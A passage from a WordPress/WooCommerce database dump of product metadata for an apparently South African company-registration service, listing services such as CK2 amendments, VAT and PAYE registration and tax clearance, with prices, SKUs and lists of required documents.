email]</li>\r\n</ol>\";}}'),(320,65,'total_sales','6'),(321,65,'_downloadable','no'),(322,65,'_virtual','yes'),(323,65,'_purchase_note',''),(324,65,'_featured','no'),(325,65,'_weight',''),(326,65,'_length',''),(327,65,'_width',''),(328,65,'_height',''),(329,65,'_sku','MAI001'),(330,65,'_product_attributes','a:0:{}'),(331,65,'_regular_price','450.00'),(332,65,'_sale_price',''),(333,65,'_sale_price_dates_from',''),(334,65,'_sale_price_dates_to',''),(335,65,'_price','450.00'),(336,65,'_sold_individually','yes'),(337,65,'_manage_stock','no'),(338,65,'_backorders','no'),(339,65,'_stock',NULL),(340,65,'_upsell_ids','a:0:{}'),(341,65,'_crosssell_ids','a:0:{}'),(342,65,'_product_version','3.3.5'),(343,65,'_product_image_gallery',''),(345,67,'_edit_lock','1510658890:3'),(346,67,'_edit_last','3'),(347,67,'_visibility','visible'),(348,67,'_stock_status','instock'),(349,67,'yikes_woo_products_tabs','a:2:{i:0;a:3:{s:5:\"title\";s:24:\"What are you purchasing?\";s:2:\"id\";s:23:\"what-are-you-purchasing\";s:7:\"content\";s:70:\"<ul>\r\n 	<li>Amended Close Corporation Certificate CK2/CK2A</li>\r\n</ul>\";}i:1;a:3:{s:5:\"title\";s:19:\"What do we require?\";s:2:\"id\";s:18:\"what-do-we-require\";s:7:\"content\";s:900:\"<ol>\r\n 	<li>Certified identity copy of applicant.</li>\r\n 	<li>Certified ID copies of all members and resigning members.</li>\r\n 	<li>A written instrument signed by all members including the new members consenting to the changes - it can be in the form of minutes, agreement, resolution etc, certified as a true copy of the original. [We can supply this].</li>\r\n 	<li>Certified copies of passports and in the case of refugees or asylum seekers – a certified copy of valid prescribed documentation.</li>\r\n 	<li>In the case of a deceased member, an executor’s letter issued by the Master of the High Court, The CK2 document must be signed by the executor. A certified ID copy of the executor of the estate must also be attached.</li>\r\n 	<li>Where the CC has more than one member all members should provide certified ID copies, including the person who will be lodging on behalf of others.</li>\r\n</ol>\";}}'),(350,67,'total_sales','5'),(351,67,'_downloadable','no'),(352,67,'_virtual','yes'),(353,67,'_purchase_note',''),(354,67,'_featured','no'),(355,67,'_weight',''),(356,67,'_length',''),(357,67,'_width',''),(358,67,'_height',''),(359,67,'_sku','MAI002'),(360,67,'_product_attributes','a:0:{}'),(361,67,'_regular_price','450.00'),(362,67,'_sale_price',''),(363,67,'_sale_price_dates_from',''),(364,67,'_sale_price_dates_to',''),(365,67,'_price','450.00'),(366,67,'_sold_individually','yes'),(367,67,'_manage_stock','no'),(368,67,'_backorders','no'),(369,67,'_stock',NULL),(370,67,'_upsell_ids','a:1:{i:0;i:65;}'),(371,67,'_crosssell_ids','a:1:{i:0;i:69;}'),(372,67,'_product_version','3.0.8'),(373,67,'_product_image_gallery',''),(374,68,'_edit_lock','1510658879:3'),(375,68,'_edit_last','3'),(376,68,'_visibility','visible'),(377,68,'_stock_status','instock'),(378,68,'yikes_woo_products_tabs','a:2:{i:0;a:3:{s:5:\"title\";s:25:\"What are your purchasing?\";s:2:\"id\";s:24:\"what-are-your-purchasing\";s:7:\"content\";s:76:\"<ul>\r\n 	<li>Certificate of change of Registered address COR 21.1</li>\r\n</ul>\";}i:1;a:3:{s:5:\"title\";s:19:\"What do we require?\";s:2:\"id\";s:18:\"what-do-we-require\";s:7:\"content\";s:484:\"• Company documents/ company details\r\n• Current director/s\r\n• Intended changes along with new information\r\n• Certified ID copies of all members (current, to be added and/or to be removed)\r\n• Notice of meeting (drafted by us and sent to customers for signage)\r\n• Minutes of meeting (drafted by us and sent to customers for signage)\r\n• Power of Attorney, to authorise us to carry out any changes on the customer’s behalf (drafted by us and sent to customers for signage)\";}}'),(379,68,'total_sales','4'),(380,68,'_downloadable','no'),(381,68,'_virtual','yes'),(382,68,'_purchase_note',''),(383,68,'_featured','no'),(384,68,'_weight',''),(385,68,'_length',''),(386,68,'_width',''),(387,68,'_height',''),(388,68,'_sku','MAI003'),(389,68,'_product_attributes','a:0:{}'),(390,68,'_regular_price','450.00'),(391,68,'_sale_price',''),(392,68,'_sale_price_dates_from',''),(393,68,'_sale_price_dates_to',''),(394,68,'_price','450.00'),(395,68,'_sold_individually','yes'),(396,68,'_manage_stock','no'),(397,68,'_backorders','no'),(398,68,'_stock',NULL),(399,68,'_upsell_ids','a:0:{}'),(400,68,'_crosssell_ids','a:0:{}'),(401,68,'_product_version','3.0.8'),(402,68,'_product_image_gallery',''),(403,69,'_edit_lock','1510658867:3'),(404,69,'_edit_last','3'),(405,69,'_visibility','visible'),(406,69,'_stock_status','instock'),(407,69,'yikes_woo_products_tabs','a:2:{i:0;a:3:{s:5:\"title\";s:24:\"What are you purchasing?\";s:2:\"id\";s:23:\"what-are-you-purchasing\";s:7:\"content\";s:70:\"<ul>\r\n 	<li>Amended Close Corporation Certificate CK2/CK2A</li>\r\n</ul>\";}i:1;a:3:{s:5:\"title\";s:19:\"What do we require:\";s:2:\"id\";s:18:\"what-do-we-require\";s:7:\"content\";s:472:\"• CC documents/ CC details\r\n• Current Member/s\r\n• Intended changes along with new information\r\n• Certified ID copies of all members (current, to be added and/or to be removed)\r\n• Notice of meeting (drafted by us and sent to customers for signage)\r\n• Minutes of meeting (drafted by us and sent to customers for signage)\r\n• Power of Attorney, to authorise us to carry out any changes on the customer’s behalf (drafted by us and sent to customers for signage)\";}}'),(408,69,'total_sales','3'),(409,69,'_downloadable','no'),(410,69,'_virtual','yes'),(411,69,'_purchase_note',''),(412,69,'_featured','no'),(413,69,'_weight',''),(414,69,'_length',''),(415,69,'_width',''),(416,69,'_height',''),(417,69,'_sku','MAI004'),(418,69,'_product_attributes','a:0:{}'),(419,69,'_regular_price','450.00'),(420,69,'_sale_price',''),(421,69,'_sale_price_dates_from',''),(422,69,'_sale_price_dates_to',''),(423,69,'_price','450.00'),(424,69,'_sold_individually','yes'),(425,69,'_manage_stock','no'),(426,69,'_backorders','no'),(427,69,'_stock',NULL),(428,69,'_upsell_ids','a:0:{}'),(429,69,'_crosssell_ids','a:0:{}'),(430,69,'_product_version','3.0.8'),(431,69,'_product_image_gallery',''),(432,70,'_edit_lock','1531900432:2'),(433,70,'_edit_last','1'),(434,70,'_visibility','visible'),(435,70,'_stock_status','instock'),(436,70,'yikes_woo_products_tabs','a:2:{i:0;a:3:{s:5:\"title\";s:24:\"What are you purchasing?\";s:2:\"id\";s:23:\"what-are-you-purchasing\";s:7:\"content\";s:147:\"<ul>\r\n 	<li>Certificate / proof of submission confirming payment of annual returns to CIPC.</li>\r\n</ul>\r\n<strong> </strong>\r\n\r\n<strong> </strong>\";}i:1;a:3:{s:5:\"title\";s:19:\"What do we require?\";s:2:\"id\";s:18:\"what-do-we-require\";s:7:\"content\";s:344:\"<ol>\r\n 	<li> Name of the company</li>\r\n 	<li> Registration number of the company</li>\r\n 	<li>The annual turnover of the company<span style=\"line-height: 1.5;\">Once we receive the above mentioned information, we will calculate the annual return fee and send you a notification about the amount that needs to be paid to CIPC.</span></li>\r\n</ol>\";}}'),(437,70,'total_sales','9'),(438,70,'_downloadable','no'),(439,70,'_virtual','yes'),(440,70,'_purchase_note','If annual Returns are outstanding for more than 1 year, a fee will be charged for each year.\r\nAlso our fee does not include CIPC fee.'),(441,70,'_featured','no'),(442,70,'_weight',''),(443,70,'_length',''),(444,70,'_width',''),(445,70,'_height',''),(446,70,'_sku','MAI005'),(447,70,'_product_attributes','a:0:{}'),(448,70,'_regular_price','450.00'),(449,70,'_sale_price',''),(450,70,'_sale_price_dates_from',''),(451,70,'_sale_price_dates_to',''),(452,70,'_price','450.00'),(453,70,'_sold_individually','yes'),(454,70,'_manage_stock','no'),(455,70,'_backorders','no'),(456,70,'_stock',NULL),(457,70,'_upsell_ids','a:0:{}'),(458,70,'_crosssell_ids','a:0:{}'),(459,70,'_product_version','3.3.5'),(460,70,'_product_image_gallery',''),(461,71,'_edit_lock','1480584284:2'),(462,71,'_edit_last','1'),(463,71,'_visibility','visible'),(464,71,'_stock_status','instock'),(465,71,'yikes_woo_products_tabs','a:2:{i:0;a:3:{s:5:\"title\";s:24:\"What are you purchasing?\";s:2:\"id\";s:23:\"what-are-you-purchasing\";s:7:\"content\";s:73:\"<ul>\r\n	<li>Amended Auditor Appointed Certificate COR 44/ CK2A</li>\r\n</ul>\";}i:1;a:3:{s:5:\"title\";s:19:\"What do we require?\";s:2:\"id\";s:18:\"what-do-we-require\";s:7:\"content\";s:165:\"• Certified identity copy of applicant / person who signed the Co44/CK2A form.\r\n• Certified copies of all audit committee members only with appointment identity.\";}}'),(466,71,'total_sales','0'),(467,71,'_downloadable','no'),(468,71,'_virtual','yes'),(469,71,'_purchase_note',''),(470,71,'_featured','no'),(471,71,'_weight',''),(472,71,'_length',''),(473,71,'_width',''),(474,71,'_height',''),(475,71,'_sku','MAI006'),(476,71,'_product_attributes','a:0:{}'),(477,71,'_regular_price','450.00'),(478,71,'_sale_price',''),(479,71,'_sale_price_dates_from',''),(480,71,'_sale_price_dates_to',''),(481,71,'_price','450.00'),(482,71,'_sold_individually',''),(483,71,'_manage_stock','no'),(484,71,'_backorders','no'),(485,71,'_stock',''),(486,71,'_upsell_ids','a:0:{}'),(487,71,'_crosssell_ids','a:0:{}'),(488,71,'_product_version','2.5.5'),(489,71,'_product_image_gallery',''),(490,72,'_edit_lock','1510658833:3'),(491,72,'_edit_last','3'),(492,72,'_visibility','visible'),(493,72,'_stock_status','instock'),(494,72,'yikes_woo_products_tabs','a:2:{i:0;a:3:{s:5:\"title\";s:24:\"What are you purchasing?\";s:2:\"id\";s:23:\"what-are-you-purchasing\";s:7:\"content\";s:193:\"<ul>\r\n 	<li>Confirmation of Re- Instatement Certificate (COR 40.5)</li>\r\n 	<li>Abridged Annual Return Certificate – Indicating proof of payment for all outstanding Annual Returns.</li>\r\n</ul>\";}i:1;a:3:{s:5:\"title\";s:19:\"What do we require?\";s:2:\"id\";s:18:\"what-do-we-require\";s:7:\"content\";s:997:\"<ol>\r\n 	<li>Certified ID Copy of Directors/Members</li>\r\n 	<li>Company/ Close Corporation Documents.</li>\r\n 	<li>Income Tax No. ( If applicable )</li>\r\n 	<li>If Company/CC owns immovable property, full property description &amp; Deeds office where property was registered.</li>\r\n 	<li>If CC/Company owns immovable property, a Municipal Account in the name of the Company/ CC is required.</li>\r\n 	<li> Power of attorney which gives us authority to restore the Company/CC (will be sent to you via email once the order is placed).</li>\r\n 	<li>Affidavit confirming why the company has been deregistered. (will be sent to you via email once the order is placed).</li>\r\n 	<li>Bank Statements showing activity during de-registration period, ie 3 months before and 3 months after deregistration date. (If you do not know the deregistration date we will inform you)</li>\r\n 	<li>If your business premises are rented a signed rental agreement that existed during the period of de-registration.</li>\r\n</ol>\";}}'),(495,72,'total_sales','3'),(496,72,'_downloadable','no'),(497,72,'_virtual','yes'),(498,72,'_purchase_note',''),(499,72,'_featured','no'),(500,72,'_weight',''),(501,72,'_length',''),(502,72,'_width',''),(503,72,'_height',''),(504,72,'_sku','MAI007'),(505,72,'_product_attributes','a:0:{}'),(506,72,'_regular_price','3500.00'),(507,72,'_sale_price',''),(508,72,'_sale_price_dates_from',''),(509,72,'_sale_price_dates_to',''),(510,72,'_price','3500.00'),(511,72,'_sold_individually','yes'),(512,72,'_manage_stock','no'),(513,72,'_backorders','no'),(514,72,'_stock',NULL),(515,72,'_upsell_ids','a:2:{i:0;i:59;i:1;i:28;}'),(516,72,'_crosssell_ids','a:1:{i:0;i:237;}'),(517,72,'_product_version','3.0.8'),(518,72,'_product_image_gallery',''),(519,73,'_edit_lock','1566829482:1'),(520,73,'_edit_last','1'),(521,73,'_visibility','visible'),(522,73,'_stock_status','instock'),(524,73,'total_sales','1'),(525,73,'_downloadable','no'),(526,73,'_virtual','yes'),(527,73,'_purchase_note',''),(528,73,'_featured','no'),(529,73,'_weight',''),(530,73,'_length',''),(531,73,'_width',''),(532,73,'_height',''),(533,73,'_sku','MAI008'),(534,73,'_product_attributes','a:0:{}'),(535,73,'_regular_price','500.00'),(536,73,'_sale_price',''),(537,73,'_sale_price_dates_from',''),(538,73,'_sale_price_dates_to',''),(539,73,'_price','500.00'),(540,73,'_sold_individually','yes'),(541,73,'_manage_stock','no'),(542,73,'_backorders','no'),(543,73,'_stock',''),(544,73,'_upsell_ids','a:0:{}'),(545,73,'_crosssell_ids','a:0:{}'),(546,73,'_product_version','3.7.0'),(547,73,'_product_image_gallery',''),(548,74,'_edit_lock','1565878062:3'),(549,74,'_edit_last','3'),(550,74,'_visibility','visible'),(551,74,'_stock_status','instock'),(553,74,'total_sales','3'),(554,74,'_downloadable','no'),(555,74,'_virtual','yes'),(556,74,'_purchase_note',''),(557,74,'_featured','no'),(558,74,'_weight',''),(559,74,'_length',''),(560,74,'_width',''),(561,74,'_height',''),(562,74,'_sku','SARS001'),(563,74,'_product_attributes','a:0:{}'),(564,74,'_regular_price','150'),(565,74,'_sale_price',''),(566,74,'_sale_price_dates_from',''),(567,74,'_sale_price_dates_to',''),(568,74,'_price','150'),(569,74,'_sold_individually','yes'),(570,74,'_manage_stock','no'),(571,74,'_backorders','no'),(572,74,'_stock',NULL),(573,74,'_upsell_ids','a:2:{i:0;i:76;i:1;i:237;}'),(574,74,'_crosssell_ids','a:2:{i:0;i:75;i:1;i:78;}'),(575,74,'_product_version','3.6.5'),(576,74,'_product_image_gallery',''),(577,75,'_edit_lock','1510659003:3'),(578,75,'_edit_last','3'),(579,75,'_visibility','visible'),(580,75,'_stock_status','instock'),(581,75,'yikes_woo_products_tabs','a:2:{i:0;a:3:{s:5:\"title\";s:18:\"What do we require\";s:2:\"id\";s:18:\"what-do-we-require\";s:7:\"content\";s:853:\"<ul>\r\n 	<li>CC/Company Documents</li>\r\n 	<li>Members/Directors certified ID copies along with proof of address of one of the members/directors</li>\r\n 	<li>Business description/activity</li>\r\n 	<li>Date on which the first contributor (employee) was employed</li>\r\n 	<li>Estimated payroll for the following 12 months and number of employees on which payroll is based</li>\r\n 	<li>Original letter from bank confirming banking details of the CC/Company stamped by the bank</li>\r\n 	<li>Proof of Address of the CC/Company. It can even be same as the residential address of one of the members/directors, if you don’t have a separate business premises for now or if you trade from home.</li>\r\n 	<li>Power of Attorney which gives us the authority to apply for Income Tax on your behalf (which will be sent to you via email once the order is placed).</li>\r\n</ul>\";}i:1;a:3:{s:5:\"title\";s:23:\"What are you purchasing\";s:2:\"id\";s:23:\"what-are-you-purchasing\";s:7:\"content\";s:84:\"Once the PAYE Registration is complete, you will receive proof of PAYE registration.\";}}'),(582,75,'total_sales','7'),(583,75,'_downloadable','no'),(584,75,'_virtual','yes'),(585,75,'_purchase_note',''),(586,75,'_featured','no'),(587,75,'_weight',''),(588,75,'_length',''),(589,75,'_width',''),(590,75,'_height',''),(591,75,'_sku','SARS003'),(592,75,'_product_attributes','a:0:{}'),(593,75,'_regular_price','1500.00'),(594,75,'_sale_price',''),(595,75,'_sale_price_dates_from',''),(596,75,'_sale_price_dates_to',''),(597,75,'_price','1500.00'),(598,75,'_sold_individually','yes'),(599,75,'_manage_stock','no'),(600,75,'_backorders','no'),(601,75,'_stock',NULL),(602,75,'_upsell_ids','a:1:{i:0;i:77;}'),(603,75,'_crosssell_ids','a:0:{}'),(604,75,'_product_version','3.0.8'),(605,75,'_product_image_gallery',''),(606,76,'_edit_lock','1525626350:1'),(607,76,'_edit_last','1'),(608,76,'_visibility','visible'),(609,76,'_stock_status','instock'),(610,76,'yikes_woo_products_tabs','a:2:{i:0;a:3:{s:5:\"title\";s:23:\"What are you purchasing\";s:2:\"id\";s:23:\"what-are-you-purchasing\";s:7:\"content\";s:25:\"Tax Clearance Certificate\";}i:1;a:3:{s:5:\"title\";s:18:\"What do we require\";s:2:\"id\";s:18:\"what-do-we-require\";s:7:\"content\";s:84:\"<ul>\r\n 	<li>Personal or Business details</li>\r\n 	<li>Income tax number/s</li>\r\n</ul>\";}}'),(611,76,'total_sales','5'),(612,76,'_downloadable','no'),(613,76,'_virtual','yes'),(614,76,'_purchase_note',''),(615,76,'_featured','yes'),(616,76,'_weight',''),(617,76,'_length',''),(618,76,'_width',''),(619,76,'_height',''),(620,76,'_sku','SARS006'),(621,76,'_product_attributes','a:0:{}'),(622,76,'_regular_price','450'),(623,76,'_sale_price',''),(624,76,'_sale_price_dates_from',''),(625,76,'_sale_price_dates_to',''),(626,76,'_price','450'),(627,76,'_sold_individually','yes'),(628,76,'_manage_stock','no'),(629,76,'_backorders','no'),(630,76,'_stock',NULL),(631,76,'_upsell_ids','a:2:{i:0;i:59;i:1;i:237;}'),(632,76,'_crosssell_ids','a:1:{i:0;i:28;}'),(633,76,'_product_version','3.3.5'),(634,76,'_product_image_gallery',''),(635,77,'_edit_lock','1524127169:2'),(636,77,'_edit_last','3'),(637,77,'_visibility','visible'),(638,77,'_stock_status','instock'),(639,77,'yikes_woo_products_tabs','a:2:{i:0;a:3:{s:5:\"title\";s:19:\"What do we require?\";s:2:\"id\";s:18:\"what-do-we-require\";s:7:\"content\";s:1363:\"•Original letter on the Company’s letterhead confirming the Registered Representative/ Public Officer of the company. (This letter should be originally signed by all directors/ members).\r\n•Original proof of address of the Registered Representative/ Public Officer.\r\n•Original certified Identity copy of Registered Representative/ Public Officer.\r\n•CC/Company registration documentation.\r\n•An original letter from the bank confirming the business bank account (must state when the account was opened, with a bank stamp not older than 1 month).\r\n•Original recent three months bank statements, with a bank stamp (minimum transaction required\r\nR 50,000.00 sales).\r\n•Invoices made out to the clients minimum\r\nR 50,000.00 invoices.\r\n•Original business municipal account or utility bill (not older than a month) or a CRA01 form (supplied by us) for purpose of proof of address.\r\n•Original municipal account or utility bill in the name of Members/Directors confirming the residential address. (not older than a month\r\n•Original certified clear Identity copies of Member/Directors.\r\n•SARS power of attorney which gives us the authority to apply for VAT on your behalf (which will be sent to you via email once the order is placed). The power of attorney should be signed and returned to us in original together with all the requested documentation.\";}i:1;a:3:{s:5:\"title\";s:24:\"What are you Purchasing?\";s:2:\"id\";s:23:\"what-are-you-purchasing\";s:7:\"content\";s:145:\"<ul>\r\n 	<li>On completion of the VAT Registration you will recieve a VAT Registration Number from The South African Revenue Services.</li>\r\n</ul>\";}}'),(640,77,'total_sales','4'),(641,77,'_downloadable','no'),(642,77,'_virtual','yes'),(643,77,'_purchase_note',''),(644,77,'_featured','no'),(645,77,'_weight',''),(646,77,'_length',''),(647,77,'_width',''),(648,77,'_height',''),(649,77,'_sku','SARS002'),(650,77,'_product_attributes','a:0:{}'),(651,77,'_regular_price','3500.00'),(652,77,'_sale_price',''),(653,77,'_sale_price_dates_from',''),(654,77,'_sale_price_dates_to',''),(655,77,'_price','3500.00'),(656,77,'_sold_individually','yes'),(657,77,'_manage_stock','no'),(658,77,'_backorders','no'),(659,77,'_stock',NULL),(660,77,'_upsell_ids','a:0:{}'),(661,77,'_crosssell_ids','a:0:{}'),(662,77,'_product_version','3.0.8'),(663,77,'_product_image_gallery',''),(664,78,'_edit_lock','1516701380:2'),(665,78,'_edit_last','3'),(666,78,'_visibility','visible'),(667,78,'_stock_status','instock'),(668,78,'yikes_woo_products_tabs','a:2:{i:0;a:3:{s:5:\"title\";s:18:\"What do we require\";s:2:\"id\";s:18:\"what-do-we-require\";s:7:\"content\";s:735:\"•Certified CC/Company Documents\r\n•Certified ID Copies of the Directors/ members\r\n•The Original Bank letter confirming your company banking details, with stamp, and date of account opening\r\n•Company/CC must be registered for Income Tax\r\n•Power of Attorney on your company letter head which gives us the authority to register the company for Import/Export license (which will be drafted and sent via email once order is placed)\r\n•Proof of Business Physical Address or an Affidavit confirming Business Physical Address (Affidavit will be drafted and sent via email once order is placed)\r\n•Proof of Contact details or an Affidavit confirming Contact details (Affidavit will be drafted and sent via email once order is placed)\";}i:1;a:3:{s:5:\"title\";s:23:\"What are you purchasing\";s:2:\"id\";s:23:\"what-are-you-purchasing\";s:7:\"content\";s:35:\"•Import and Export License Number\";}}'),(669,78,'total_sales','6'),(670,78,'_downloadable','no'),(671,78,'_virtual','yes'),(672,78,'_purchase_note',''),(673,78,'_featured','no'),(674,78,'_weight',''),(675,78,'_length',''),(676,78,'_width',''),(677,78,'_height',''),(678,78,'_sku','SARS004'),(679,78,'_product_attributes','a:0:{}'),(680,78,'_regular_price','2250.00'),(681,78,'_sale_price',''),(682,78,'_sale_price_dates_from',''),(683,78,'_sale_price_dates_to',''),(684,78,'_price','2250.00'),(685,78,'_sold_individually','yes'),(686,78,'_manage_stock','no'),(687,78,'_backorders','no'),(688,78,'_stock',NULL),(689,78,'_upsell_ids','a:0:{}'),(690,78,'_crosssell_ids','a:0:{}'),(691,78,'_product_version','3.0.8'),(692,78,'_product_image_gallery',''),(693,79,'_edit_lock','1526381658:1'),(694,79,'_edit_last','1'),(695,79,'_visibility','visible'),(696,79,'_stock_status','instock'),(697,79,'yikes_woo_products_tabs','a:1:{i:0;a:3:{s:5:\"title\";s:23:\"What are you purchasing\";s:2:\"id\";s:23:\"what-are-you-purchasing\";s:7:\"content\";s:85:\"An affidavit that can be used to verify your BEE credentials if you qualify as an EME\";}}'),(698,79,'total_sales','8'),(699,79,'_downloadable','no'),(700,79,'_virtual','yes'),(701,79,'_purchase_note','We will contact you for completion of the affidavit.'),(702,79,'_featured','no'),(703,79,'_weight',''),(704,79,'_length',''),(705,79,'_width',''),(706,79,'_height',''),(707,79,'_sku','BEE001'),(708,79,'_product_attributes','a:0:{}'),(709,79,'_regular_price','199'),(710,79,'_sale_price',''),(711,79,'_sale_price_dates_from',''),(712,79,'_sale_price_dates_to',''),(713,79,'_price','199'),(714,79,'_sold_individually','yes'),(715,79,'_manage_stock','no'),(716,79,'_backorders','no'),(717,79,'_stock',NULL),(718,79,'_upsell_ids','a:0:{}'),(719,79,'_crosssell_ids','a:0:{}'),(720,79,'_product_version','3.3.5'),(721,79,'_product_image_gallery',''),(722,80,'_edit_lock','1525631934:1'),(723,80,'_edit_last','1'),(724,80,'_visibility','visible'),(725,80,'_stock_status','instock'),(727,80,'total_sales','6'),(728,80,'_downloadable','yes'),(729,80,'_virtual','yes'),(730,80,'_purchase_note','Use the password:\r\n\r\ncompanyregistration.online\r\n\r\nto open the report.'),(731,80,'_featured','no'),(732,80,'_weight',''),(733,80,'_length',''),(734,80,'_width',''),(735,80,'_height',''),(736,80,'_sku','FREE eReport'),(737,80,'_product_attributes','a:0:{}'),(738,80,'_regular_price','199'),(739,80,'_sale_price',''),(740,80,'_sale_price_dates_from',''),(741,80,'_sale_price_dates_to',''),(742,80,'_price','199'),(743,80,'_sold_individually','yes'),(744,80,'_manage_stock','no'),(745,80,'_backorders','no'),(746,80,'_stock',NULL),(747,80,'_upsell_ids','a:4:{i:0;i:59;i:1;i:76;i:2;i:237;i:3;i:79;}'),(748,80,'_crosssell_ids','a:2:{i:0;i:28;i:1;i:77;}'),(749,80,'_product_version','3.3.5'),(750,80,'_product_image_gallery',''),(751,83,'_edit_lock','1465984291:2'),(752,83,'_edit_last','2'),(754,83,'_responsive_layout','default'),(761,91,'_edit_lock','1465984165:2'),(762,91,'_edit_last','2'),(770,91,'_responsive_layout','default'),(772,96,'_edit_lock','1465983723:2'),(773,96,'_edit_last','2'),(775,96,'_responsive_layout','default'),(776,99,'_edit_lock','1465983575:2'),(777,99,'_edit_last','2'),(779,99,'_responsive_layout','default'),(781,103,'_edit_lock','1465983355:2'),(782,103,'_edit_last','2'),(784,103,'_responsive_layout','default'),(785,105,'_edit_lock','1465983254:2'),(786,105,'_edit_last','2'),(788,105,'_responsive_layout','default'),(790,109,'_edit_lock','1465983139:2'),(791,109,'_edit_last','2'),(793,109,'_responsive_layout','default'),(794,112,'_edit_lock','1465982882:2'),(795,112,'_edit_last','2'),(797,112,'_responsive_layout','default'),(798,114,'_edit_lock','1465982828:2'),(799,114,'_edit_last','2'),(801,114,'_responsive_layout','default'),(803,118,'_edit_lock','1480588398:2'),(804,118,'_edit_last','2'),(806,118,'_responsive_layout','default'),(808,122,'_edit_lock','1465982804:2'),(809,122,'_edit_last','2'),(811,122,'_responsive_layout','default'),(812,124,'_edit_lock','1465982591:2'),(813,124,'_edit_last','1'),(815,124,'_responsive_layout','default'),(818,128,'_edit_lock','1465982524:2'),(819,128,'_edit_last','1'),(821,128,'_responsive_layout','default'),(823,132,'_edit_lock','1465982391:2'),(824,132,'_edit_last','1'),(826,132,'_responsive_layout','default'),(828,134,'_edit_lock','1465982335:2'),(829,134,'_edit_last','1'),(831,134,'_responsive_layout','default'),(834,136,'_edit_lock','1465982146:2'),(835,136,'_edit_last','1'),(837,136,'_responsive_layout','default'),(841,141,'_edit_lock','1458656421:1'),(842,141,'_edit_last','1'),(843,141,'form_id','141'),(844,141,'form_style','{\"layout\":\"form-vertical\",\"theme\":\"wr-style-light\",\"themes_style\":{\"light\":\"{\\\"background_color\\\":\\\"#ffffff\\\",\\\"background_active_color\\\":\\\"#fcf8e3\\\",\\\"border_thickness\\\":\\\"0\\\",\\\"border_color\\\":\\\"#ffffff\\\",\\\"border_active_color\\\":\\\"#fbeed5\\\",\\\"rounded_corner_radius\\\":\\\"0\\\",\\\"padding_space\\\":\\\"10\\\",\\\"margin_space\\\":\\\"0\\\",\\\"text_color\\\":\\\"#333333\\\",\\\"font_type\\\":\\\"Verdana, Geneva, sans-serif\\\",\\\"font_size\\\":\\\"14\\\",\\\"field_background_color\\\":\\\"#ffffff\\\",\\\"field_border_color\\\":\\\"#cccccc\\\",\\\"field_shadow_color\\\":\\\"#ffffff\\\",\\\"field_text_color\\\":\\\"#666666\\\",\\\"message_error_background_color\\\":\\\"#b94a48\\\",\\\"message_error_text_color\\\":\\\"#ffffff\\\",\\\"help_text_type\\\":\\\"tooltip\\\",\\\"button_position\\\":\\\"btn-toolbar\\\",\\\"button_submit_color\\\":\\\"btn btn-primary\\\",\\\"button_reset_color\\\":\\\"btn\\\",\\\"button_prev_color\\\":\\\"btn\\\",\\\"button_next_color\\\":\\\"btn\\\",\\\"custom_css\\\":\\\"\\\"}\",\"dark\":\"{\\\"background_color\\\":\\\"#ffffff\\\",\\\"background_active_color\\\":\\\"#444444\\\",\\\"border_thickness\\\":\\\"0\\\",\\\"border_color\\\":\\\"#ffffff\\\",\\\"border_active_color\\\":\\\"#666666\\\",\\\"rounded_corner_radius\\\":\\\"0\\\",\\\"padding_space\\\":\\\"10\\\",\\\"margin_space\\\":\\\"0\\\",\\\"text_color\\\":\\\"#c6c6c6\\\",\\\"font_type\\\":\\\"Verdana, Geneva, sans-serif\\\",\\\"font_size\\\":\\\"14\\\",\\\"field_background_color\\\":\\\"#000000\\\",\\\"field_border_color\\\":\\\"#111111\\\",\\\"field_shadow_color\\\":\\\"#000000\\\",\\\"field_text_color\\\":\\\"#333333\\\",\\\"message_error_background_color\\\":\\\"#b94a48\\\",\\\"message_error_text_color\\\":\\\"#ffffff\\\",\\\"help_text_type\\\":\\\"tooltip\\\",\\\"button_position\\\":\\\"btn-toolbar\\\",\\\"button_submit_color\\\":\\\"btn btn-primary\\\",\\\"button_reset_color\\\":\\\"btn\\\",\\\"button_prev_color\\\":\\\"btn\\\",\\\"button_next_color\\\":\\\"btn\\\",\\\"custom_css\\\":\\\"\\\"}\"},\"themes\":[\"light\",\"dark\"],\"background_color\":\"#ffffff\",\"background_active_color\":\"#fcf8e3\",\"border_thickness\":\"0\",\"border_color\":\"#ffffff\",\"border_active_color\":\"#fbeed5\",\"rounded_corner_radius\":\"0\",\"padding_space\":\"10\",\"margin_space\":\"0\",\"text_color\":\"#333333\",\"font_type\":\"Verdana, Geneva, sans-serif\",\"font_size\":\"14\",\"field_background_color\":\"#ffffff\",\"field_border_color\":\"#cccccc\",\"field_shadow_color\":\"#ffffff\",\"field_text_color\":\"#666666\",\"message_error_background_color\":\"#b94a48\",\"message_error_text_color\":\"#ffffff\",\"help_text_type\":\"tooltip\",\"button_position\":\"btn-toolbar\",\"button_submit_color\":\"btn btn-primary\",\"button_reset_color\":\"btn\",\"button_prev_color\":\"btn\",\"button_next_color\":\"btn\",\"custom_css\":\"\"}'),(845,141,'form_settings','{\"form_captcha\":\"\",\"form_btn_next_text\":\"Next\",\"form_btn_prev_text\":\"Prev\",\"form_btn_submit_text\":\"Submit\",\"form_btn_reset_text\":\"Reset\",\"form_state_btn_reset_text\":\"No\"}'),(846,141,'form_type','1'),(847,141,'list_email_send_to',''),(848,141,'list_email_send_to_submitter',''),(849,141,'content_email_send_to',''),(850,141,'content_email_send_to_submitter',''),(851,141,'form_post_action_data','a:9:{s:15:\"contactform_url\";s:0:\"\";s:24:\"contactform_show_message\";s:35:\"<div>Thanks for your submit! </div>\";s:4:\"post\";s:3:\"136\";s:4:\"page\";s:2:\"52\";s:7:\"product\";s:2:\"59\";s:8:\"category\";s:1:\"1\";s:11:\"product_cat\";s:1:\"8\";s:11:\"product_tag\";s:2:\"21\";s:22:\"product_shipping_class\";s:2:\"19\";}'),(852,141,'action_save_submissions','Yes'),(853,141,'form_post_action','contactform_show_message'),(854,141,'mailchimp_settings','{\"use\":\"no\",\"apikey\":\"\",\"lists\":[]}'),(892,144,'_edit_lock','1499417790:1'),(893,144,'_edit_last','1'),(895,144,'_responsive_layout','default'),(905,147,'_menu_item_type','post_type'),(906,147,'_menu_item_menu_item_parent','173'),(907,147,'_menu_item_object_id','28'),(908,147,'_menu_item_object','product'),(909,147,'_menu_item_target',''),(910,147,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(911,147,'_menu_item_xfn',''),(912,147,'_menu_item_url',''),(1133,173,'_menu_item_type','taxonomy'),(1134,173,'_menu_item_menu_item_parent','0'),(1135,173,'_menu_item_object_id','7'),(1136,173,'_menu_item_object','product_cat'),(1137,173,'_menu_item_target',''),(1138,173,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1139,173,